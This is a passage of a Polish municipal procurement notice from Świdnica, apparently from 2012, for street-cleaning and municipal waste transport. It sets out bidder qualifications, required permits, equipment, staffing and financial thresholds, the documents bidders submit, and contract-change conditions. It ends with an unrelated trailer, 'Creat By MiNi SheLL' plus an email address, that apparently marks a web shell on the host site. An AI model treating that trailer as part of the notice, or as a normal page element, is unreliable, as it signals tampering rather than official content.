c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania, tj.

a) Wykonawca wykaże, że posiada zezwolenie Prezydenta Miasta Świdnicy na odbiór odpadów komunalnych od właścicieli nieruchomości o którym mowa w art. 7 ust. 1 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach ( jednolity tekst Dz.U. Nr 236   z 2005 r. poz. 2008 z późniejszymi zmianami ),

b) Wykonawca wykaże, że posiada  zezwolenie  starosty  na transport odpadów komunalnych o którym mowa w art. 28 ustawy o odpadach ( tekst jednolity Dz.U. Nr 185 z 2010 r. poz.1243 z późniejszymi zmianami ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres potwierdzi wykonanie usług (a w przypadku  świadczeń okresowych lub ciągłych również wykonywanych ) odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości łącznej nie mniejszej niż  300 000 zł brutto,  w tym jedno zadanie na kwotę minimum 100 000 zł ,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi o wyżej wymienionym zakresie zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawca musi spełniać następujący warunek:

6.1.3.1 dysponować bazą sprzętowo- warsztatową zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica,

6.1.3.2 posiadać aktualną umowę na składowanie odpadów komunalnych na wysypisku lub zgodę właściciela ( zarządcy ) wysypiska śmieci na przyjęcie odpadów komunalnych  z terenu miasta Świdnicy,

6.1.3.3 dysponować sprzętem w celu realizacji zamówienia. 
Wymagane minimum to: 
- 50 zestawów do ręcznego oczyszczania ( wózek kołowy ręczny, miotły winylowe,
 wiadra ),
                                                       -5-
                                         

- pojazd przystosowany do transportu odpadów komunalnych zabezpieczony przed wysypywaniem i rozwiewaniem odpadów o masie całkowitej powyżej 3,5 tony  ( w opisie sprzętu należy podać sposób zabezpieczenia ) - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawca musi spełniać następujący warunek:
dysponować 2 osobami posiadającymi wymagane uprawnienia do kierowania  pojazdem przystosowanym do transportu odpadów o masie całkowitej powyżej 3,5 tony,

6.1.3.5 dysponować kierownikiem robot posiadającym minimum średnie wykształcenie,

6.1.3.6 posiadać średnie roczne zatrudnienie w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy to za ten okres nie niższe niż 25 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 100 000 zł ( sto tysięcy złotych ) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50 000 zł ( pięćdziesiąt tysięcy złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.1.3.5 dokument potwierdzający prawo dysponowania bazą sprzętowo - warsztatową,  zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica ( załącznik nr 10 do oferty
Dodatkowo Wykonawca winien do oferty dołączyć: 
- dowód wniesienia wadium ( załącznik nr 21 do oferty Wykonawcy ),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba ( osoby nie wskazane w dokumencie rejestrowym ) upoważniona do składania oświadczeń woli przez Wykonawcę  ( załącznik nr 22 do oferty Wykonawcy  ),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej 
( załącznik nr 23 do oferty  Wykonawcy ),
- kosztorys ofertowy - załącznik J do SIWZ ( załącznik nr 24 do oferty Wykonawcy ),
- zaparafowany projekt umowy - załącznik K do SIWZ ( załącznik nr 25 do oferty Wykonawcy).

Wykonawcy ).
7.1.3.6  aktualna umowa na składowanie odpadów komunalnych na wysypisku lub zgoda właściciela ( zarządcy ) wysypiska śmieci na przyjęcie odpadów komunalnych z terenu  miasta Świdnicy ( załącznik nr 11 do oferty Wykonawcy ).

Zamawiający dopuszcza realizację zamówienia w systemie podwykonawczym , przy czym Wykonawca składający ofertę winien samodzielnie zrealizować 75% zamówienia.
Wzór wykazu podwykonawców stanowi załącznik  H do SIWZ ( załącznik nr 12 do oferty Wykonawcy ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego ( korzyść ekonomiczna, techniczna, eksploatacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com